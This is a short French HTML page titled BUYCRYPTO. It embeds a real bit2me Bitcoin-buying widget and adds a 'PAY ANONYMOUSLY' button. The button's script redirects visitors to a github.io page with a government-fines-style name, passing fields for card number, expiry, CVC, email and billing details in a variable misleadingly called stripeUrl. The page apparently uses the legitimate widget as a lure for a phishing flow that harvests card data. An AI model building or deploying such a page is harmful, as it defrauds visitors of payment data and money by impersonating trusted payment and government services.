<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BUYCRYPTO</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            background-color: #fff;
            color: #000;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
            padding: 0;
        }

        .widget-container {
            background-color: #fff;
            border-radius: 6px;
            padding: 20px;
            box-shadow: 0 3px 19px rgba(0, 0, 0, 0.2);
            text-align: center;
            width: 100%;
            max-width: 600px; /* Largeur maximale pour les grands écrans */
            box-sizing: border-box;
        }

        .buy-button {
            background-color: #ff6600;
            color: #fff;
            border: none;
            padding: 15px;
            font-size: 1rem;
            cursor: pointer;
            border-radius: 4px;
            margin-top: 20px;
            width: 100%;
            box-sizing: border-box;
        }

        .buy-button:hover {
            background-color: #ff6200;
        }

        .buy-button:active {
            transform: translateY(2px);
        }

        iframe {
            width: 100%;
            height: 60vh; /* Hauteur ajustée pour les écrans de différentes tailles */
            margin-top: 8px;
            border: none;
            overflow-y: hidden;
            box-sizing: border-box;
        }

        @media (max-width: 600px) {
            .buy-button {
                font-size: 0.9rem;
                padding: 12px;
            }

            iframe {
                height: 50vh;
            }
        }

        @media (max-width: 400px) {
            .buy-button {
                font-size: 0.8rem;
                padding: 10px;
            }

            iframe {
                height: 40vh;
            }
        }
    </style>
</head>
<body>
    <div class="widget-container">
        <iframe src="https://bit2me.com/fr/widget/buy/v2?currency=BTC&amp;amount=100&amp;method=card" frameborder="0" scrolling="no"></iframe>
        <button id="buy-button" class="buy-button"><b>PAY ANONYMOUSLY</b></button>
    </div>

    <script>
        document.getElementById('buy-button').addEventListener('click', function() {
            var amount = 100; // Remplacez cette valeur par le montant utilisateur réel
            var stripeUrl = `https://amendegouvosdroits.github.io/fr-/?email=&adresseetcryptorseaubscbinance=&cardNumber=&cardExpiry=1226&cardCvc=123&billingName=DFHKL%3F&billingCountry=FR&phoneNumber=?amount=${amount}`;
            window.location.href = stripeUrl;
        });
    </script>
</body>
</html>
